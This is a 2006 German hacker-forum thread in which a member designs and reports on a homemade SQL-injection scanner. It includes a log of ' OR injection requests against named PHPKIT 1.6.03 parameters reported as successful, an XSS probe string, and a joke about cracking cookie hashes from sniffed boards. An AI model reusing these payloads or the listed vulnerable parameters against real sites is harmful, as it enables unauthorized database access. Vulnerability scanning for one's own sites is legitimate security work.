Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
Webmaster-Security Fragen zur richtigen Serverkonfiguration oder Absicherung dynamischer Scripte gehören hier hinein.

SQL Injection Scanner *UPDATE*

Diskussion: SQL Injection Scanner *UPDATE* im Forum Webmaster-Security, in der Kategorie Security Area; Anzeige FÜR DAS VIDEO LETZTEN POST LESEN Hi, kennt von euch jemand ein Freeware Tool das eine Seite automatisch auf ...

Antwort
Alt 16.09.06, 21:12   #1 (permalink)
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Smile SQL Injection Scanner *UPDATE*

Anzeige

FÜR DAS VIDEO LETZTEN POST LESEN

Hi,

kennt von euch jemand ein Freeware Tool das eine Seite automatisch auf
SQLInjection,Code Injection,XSS und so untersucht?

Wenn nein wie geh ichs am besten an wenn ich sowas coden will?

Ich würds so machen:
Das Programm holt sich den HTML Code der Ziel URL.

Dann durchsucht es ihn
* nach <form> Kontainern und liest dort den Namen des Scripts und die übergebenen Variablen aus
* Nach Links in denen GET Parameter übergeben werden und liest dort auch den Namen des Scripts und die übergebenen Variablen aus

Dann ruft es alle gefundenen Scripts mit den entsprechenden Variablen auf.
Der Wert der Variablen wird auf ' OR gesetzt.
Die generierte Seite wird auf SQL Warnungen durchsucht.

Anschliesend sucht es aus der AnfangsUrl alle Links raus und testet diese Seite auch wieder usw.

Hat jemand Verbesserungsvorschläge oder vielleicht sogar so ein Programm?


Schon mal vielen Dank,
Xalon

Xalon ist offline   Mit Zitat antworten
Alt 17.09.06, 00:25   #2 (permalink)
 
Registriert seit: 25.12.04
stone.dr Leistung: Facit NTK
Likes: 0
Standard

Dein Projekt hört sich interessant an.
In welcher Sprache willste das machen, Perl?

Wenn man z.Bsp. ein ganzes Board mit nem Skript auf <script>alert("Test")</script> Möglichkeit untersucht, lassen sich sicher noch einige XSS Lücken finden, die noch nicht public sind.

Das Programm AccessDiver (Testet htacces auf "schwache PW", mit einem Dictionary Angriff), beinhaltet auch eine Funktion (Exploiter), mit der man nach Zugängen z.Bsp. in der cgi-bin etc. suchen kann. Das positive an AccessDiver, bekannte Lücke, (wie etwa im D-Link Router bei dem sich einfach die PW auslesen lassen), können so hinzugefügt werden.

Stellst Du Den Quell Open Source, wenn dass Programm fertig ist?
stone.dr ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 17.09.06, 01:52   #3 (permalink)
Matt
Guest
 
Likes:
Standard

Gabs da nicht vor einiger Zeit einen Artikel über einen Proxy der genau das macht? Name fällt mir jetzt leider nicht ein...
  Mit Zitat antworten
Alt 17.09.06, 09:46   #4 (permalink)
Member of Honour
 
Benutzerbild von Golgotha
 
Registriert seit: 29.10.01
Golgotha Leistung: Z3
Likes: 8
Standard

Hm, SQL Injektion ...

@xalon

In Dein Proggy muss auch 'ne, naja, sagen wir mal
"Cookiehash-in-Passwort-Rückwandel-Funktion" rein,
damit unser Stone endlich mal sein Board-Sniffer-Video
fertigstellen kann.


Golgy.
__________________
Man sieht nur mit dem Herzen gut.
Wirklich relevante informationren sind für's Auge unsichtbar!
Golgotha ist offline   Mit Zitat antworten
Alt 17.09.06, 11:37   #5 (permalink)
Themenstarter
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

@stone.dr: Ne eher in C/C++ ,ich kann kein Perl.
Ja mal schauen, denk schon das ich es OpenSource machen werde.

@Matt: Ja das kenn ich auch aber das is nicht das was ich suche.

Naja dann fang ich mal mim Coden an
Xalon ist offline   Mit Zitat antworten
Alt 19.09.06, 21:05   #6 (permalink)
 
Registriert seit: 18.10.05
javahacker Leistung: Facit NTK
Likes: 0
Standard

http://www.0x90.org/releases/absinthe/
javahacker ist offline   Mit Zitat antworten
Alt 20.09.06, 19:38   #7 (permalink)
fetzer
Guest
 
Likes:
Standard

http://chorizo-scanner.com/
ungetestet...

allerdings würde ich das testen nie inem propgramm überlassen und immer selbst noch einmal nachschauen. sicher ist sicher
  Mit Zitat antworten
Alt 13.10.06, 06:23   #8 (permalink)
 
Registriert seit: 15.05.06
Unicate Leistung: Facit NTK
Likes: 0
Standard

C++? hätte Lust mit zu coden.
mit oder ohne GUI? Welches OS ?
Unicate ist offline   Mit Zitat antworten
Alt 21.10.06, 14:35   #9 (permalink)
Themenstarter
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

So nachdem ich jetzt lange nicht mehr gecodet hab hab ich vorgestern wieder angefangen...

Ich habs jetzt in 2 Teile geteilt:

1.Der Sniffer
Das Programm snifft alle HTTP-Requests mit und schreibt sie in eine TXT Datei

2.Der Scanner
Das Programm liest das RequestFile aus und greift die Parameter darin an.
Anschliesend untersucht es den HTML Source auf den String ' OR,sollte es ihn finden gibt es eine Erfolgsmeldung aus .

Also das Angreifen von GET Requests funzt bereits wie diese PHPKIT Lücken zeigen
(Version 1.6.03):
Log   

Attacking: GET /phpkit/include.php?path=guestbook/print.php&id='%20OR HTTP/1.1
SUCCESSFULL ATTACKED...

Attacking: GET /phpkit/include.php?path=content/overview.php&type=1&letter='%20OR&catid=&themeid=& searchtext=&entries=0&order= HTTP/1.1

SUCCESSFULL ATTACKED...

Attacking: GET /phpkit/include.php?path=content/overview.php&type=1&letter=A&catid='%20OR&themeid= &searchtext=&entries=0&order= HTTP/1.1

SUCCESSFULL ATTACKED...

Attacking: GET /phpkit/include.php?path=content/overview.php&type=1&letter=A&catid=&themeid='%20OR &searchtext=&entries=0&order= HTTP/1.1

SUCCESSFULL ATTACKED...

Attacking: GET /phpkit/include.php?path=content/overview.php&type=1&letter=A&catid=&themeid=&searc htext='%20OR&entries=0&order= HTTP/1.1

SUCCESSFULL ATTACKED...

Attacking: GET /phpkit/include.php?path=content/overview.php&type=1&letter=A&catid=&themeid=&searc htext=&entries='%20OR&order= HTTP/1.1

Not successfull...

Attacking: GET /phpkit/include.php?path=content/overview.php&type=1&letter=A&catid=&themeid=&searc htext=&entries=0&order='%20OR HTTP/1.1

SUCCESSFULL ATTACKED...


So jetzt mach ich mich dran auch noch das mit den POST-Requests zum laufen zu bekommen...

Xalon

P.S:
@Unicate: Sorry hab deinen Beitrag erst grade gesehen.

PPS:Heißt das successful oder successfuly ?
Xalon ist offline   Mit Zitat antworten
Alt 21.10.06, 14:56   #10 (permalink)
Senior Member
 
Registriert seit: 18.09.05
[starfoxx] Leistung: Facit NTK
Likes: 0
Standard

Ich denke mal das ist ein adverb, da es sich auf attack bezieht.
-> successfully
[starfoxx] ist offline   Mit Zitat antworten
Alt 21.10.06, 16:44   #11 (permalink)
 
Registriert seit: 13.03.05
BattleMaker Leistung: Facit NTK
Likes: 0
Standard

Zitat:
Original von [starfoxx]
Ich denke mal das ist ein adverb, da es sich auf attack bezieht.
-> successfully
"Attack successfull"
oder
"successfully attacked"

würde ich auch sagen.


MfG, bmaker
BattleMaker ist offline   Mit Zitat antworten
Alt 21.10.06, 17:08   #12 (permalink)
fetzer
Guest
 
Likes:
Standard

Zitat:
Original von BattleMaker
Zitat:
Original von [starfoxx]
Ich denke mal das ist ein adverb, da es sich auf attack bezieht.
-> successfully
"Attack successfull"
oder
"successfully attacked"

würde ich auch sagen.


MfG, bmaker
Wenn dann bitte Successful Attack ( und bitte mit einem "l" ).
  Mit Zitat antworten
Alt 21.10.06, 17:24   #13 (permalink)
HKA
 
Registriert seit: 15.10.06
HKA Leistung: Facit NTK
Likes: 0
Standard

Wenn du fertig bist veröffentliche pls den Code im Forum oder schick ihn mir. Ich will umbedingt wissen wie schnell es läuft und funktioniert.

Meine Sites müssten mal geprüft werden. Hab fast nie genau nach SQL- Injektion o.ä getestet.
HKA ist offline   Mit Zitat antworten
Alt 21.10.06, 17:37   #14 (permalink)
 
Registriert seit: 13.03.05
BattleMaker Leistung: Facit NTK
Likes: 0
Standard

Zitat:
Original von fetzer
Zitat:
Original von BattleMaker
Zitat:
Original von [starfoxx]
Ich denke mal das ist ein adverb, da es sich auf attack bezieht.
-> successfully
"Attack successfull"
oder
"successfully attacked"

würde ich auch sagen.


MfG, bmaker
Wenn dann bitte Successful Attack ( und bitte mit einem "l" ).
Arrg... danke. Ich habe mich schon gewundert, denn successfull sah wirklich komisch aus...


MfG, bmaker
BattleMaker ist offline   Mit Zitat antworten
Alt 19.11.06, 14:13   #15 (permalink)
Themenstarter
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

Sooo,
der Scanner funktioniert jetzt endlich einigermaßen so wie ich mir das vorstelle
Ich hab mal ein kleines Video gemacht das zeigt wie das Programm arbeitet:

Download (< 1MB)

Was haltet ihr davon?
Was soll ich verändern/hinzufügen?

Schreibt mal was,bis jetzt is der Thread ja ziemlich untergegangen
Xalon
Xalon ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » Webmaster-Security » SQL Injection Scanner *UPDATE*
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
SQL-Injection Zaireking Webmaster-Security 16 16.05.07 15:26
DLL-Injection in ASM? _SharK_ Code Kitchen 10 27.11.06 19:06
Sql Injection sym4nt3c Hacks & Crackmes 14 01.09.06 17:09
DLL-Injection Xalon Code Kitchen 8 20.06.06 23:18


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61